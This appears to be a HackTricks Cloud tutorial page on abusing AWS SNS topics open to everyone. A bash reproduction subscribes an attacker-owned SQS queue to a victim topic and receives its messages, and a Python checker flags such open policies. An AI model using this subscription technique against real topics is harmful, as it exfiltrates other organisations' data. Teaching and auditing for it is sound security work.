AWS - SNS Unauthenticated Enum
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the Discord group or the telegram group or follow us on Twitter @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
SNS
For more information about SNS, check:
Open to All
When you configure an SNS topic from the web console, you can indicate that Everyone can publish and subscribe to the topic:
So, if you find the ARN of topics inside the account (or by brute forcing possible topic names), you can check whether you can publish or subscribe to them.
This is equivalent to an SNS topic resource policy that allows sns:Subscribe to * (or to external accounts): any principal can create a subscription that delivers all future topic messages to an SQS queue that it owns. When the queue owner initiates the subscription, no human confirmation is required for SQS endpoints.
<details>
<summary>Reproduction (us-east-1)</summary>

```bash
REGION=us-east-1

# Victim account (topic owner)
VICTIM_TOPIC_ARN=$(aws sns create-topic --name exfil-victim-topic-$(date +%s) --region $REGION --query TopicArn --output text)

# Open the topic to anyone subscribing
cat > /tmp/topic-policy.json <<JSON
{"Version":"2012-10-17","Statement":[{"Sid":"OpenSubscribe","Effect":"Allow","Principal":"*","Action":"sns:Subscribe","Resource":"$VICTIM_TOPIC_ARN"}]}
JSON
aws sns set-topic-attributes --region $REGION --topic-arn "$VICTIM_TOPIC_ARN" --attribute-name Policy --attribute-value file:///tmp/topic-policy.json

# Attacker account (queue owner)
ATTACKER_Q_URL=$(aws sqs create-queue --queue-name attacker-exfil-queue-$(date +%s) --region $REGION --query QueueUrl --output text)
ATTACKER_Q_ARN=$(aws sqs get-queue-attributes --queue-url "$ATTACKER_Q_URL" --region $REGION --attribute-names QueueArn --query Attributes.QueueArn --output text)

# Allow the victim topic to send to the attacker queue
cat > /tmp/sqs-policy.json <<JSON
{"Version":"2012-10-17","Statement":[{"Sid":"AllowVictimTopicSend","Effect":"Allow","Principal":{"Service":"sns.amazonaws.com"},"Action":"sqs:SendMessage","Resource":"$ATTACKER_Q_ARN","Condition":{"ArnEquals":{"aws:SourceArn":"$VICTIM_TOPIC_ARN"}}}]}
JSON
aws sqs set-queue-attributes --queue-url "$ATTACKER_Q_URL" --region $REGION --attributes Policy="$(cat /tmp/sqs-policy.json)"

# Subscribe the attacker queue to the victim topic (auto-confirmed for SQS)
SUB_ARN=$(aws sns subscribe --region $REGION --topic-arn "$VICTIM_TOPIC_ARN" --protocol sqs --notification-endpoint "$ATTACKER_Q_ARN" --query SubscriptionArn --output text)

# Validation: publish and receive
aws sns publish --region $REGION --topic-arn "$VICTIM_TOPIC_ARN" --message '{pii:ssn:123-45-6789}'
aws sqs receive-message --queue-url "$ATTACKER_Q_URL" --region $REGION --max-number-of-messages 1 --wait-time-seconds 10 --query 'Messages[0].Body' --output text
```

</details>
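A defensive check for the misconfiguration described above, as an added example that is not part of the original page: it parses an SNS topic resource policy and reports statements that let any principal call sns:Subscribe or sns:Publish without a Condition. The function names, the sample policies and the account id are constructed for illustration, and skipping conditioned statements is a simplifying assumption.

```python
import fnmatch
import json

RISKY_ACTIONS = ("sns:Subscribe", "sns:Publish")

def _as_list(value):
    return value if isinstance(value, list) else [value]

def _is_public(principal):
    """True when the Principal element matches every AWS identity."""
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS", []))

def open_sns_statements(policy_json):
    """Return (Sid, action) pairs that let any principal subscribe or publish."""
    findings = []
    for stmt in _as_list(json.loads(policy_json).get("Statement", [])):
        if stmt.get("Effect") != "Allow" or not _is_public(stmt.get("Principal")):
            continue
        # Assumption: a Condition (such as AWS:SourceOwner) narrows the grant,
        # so conditioned statements are left for manual review, not flagged.
        if stmt.get("Condition"):
            continue
        for pattern in _as_list(stmt.get("Action", [])):
            for action in RISKY_ACTIONS:
                # IAM action names are case-insensitive and allow wildcards.
                if fnmatch.fnmatchcase(action.lower(), pattern.lower()):
                    findings.append((stmt.get("Sid", "<no Sid>"), action))
    return findings

# Constructed sample policies; the account id and topic name are placeholders.
TOPIC = "arn:aws:sns:us-east-1:111122223333:example-topic"
OPEN_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "OpenSubscribe", "Effect": "Allow", "Principal": "*",
     "Action": "sns:Subscribe", "Resource": TOPIC}]})
OWNER_ONLY_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "OwnerOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": ["SNS:Subscribe", "SNS:Publish"], "Resource": TOPIC,
     "Condition": {"StringEquals": {"AWS:SourceOwner": "111122223333"}}}]})
WILDCARD_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "AnyAction", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": "sns:*", "Resource": TOPIC}]})

if __name__ == "__main__":
    for name in ("OPEN_POLICY", "OWNER_ONLY_POLICY", "WILDCARD_POLICY"):
        print(name, open_sns_statements(globals()[name]))
```

For a real topic, the policy string is the `Policy` attribute returned by `aws sns get-topic-attributes`.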

